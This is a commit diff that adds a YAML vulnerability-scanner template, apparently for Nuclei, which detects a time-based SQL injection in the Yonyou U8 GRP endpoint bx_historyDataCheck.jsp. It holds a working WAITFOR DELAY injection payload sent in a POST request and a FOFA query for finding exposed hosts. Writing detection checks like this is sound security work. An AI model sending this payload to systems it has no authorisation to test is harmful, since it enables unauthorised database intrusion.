Merge pull request #8273 from projectdiscovery/yonyou-u8-sqli

Create yonyou-u8-sqli.yaml

http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml

@@ -0,0 +1,38 @@
+id: yonyou-u8-sqli
+
+info:
+  name: Yonyou U8 bx_historyDataCheck - SQL Injection
+  author: xianke
+  severity: high
+  description: |
+    Yonyou U8 Grp contains a SQL injection vulnerability.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
+    - https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
+  metadata:
+    max-request: 1
+    fofa-query: icon_hash="-299520369"
+    verified: true
+  tags: yonyou,grp,sqli
+
+http:
+  - raw:
+      - |
+        GET /login.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=6'
+          - 'status_code == 200'
+          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
+        condition: and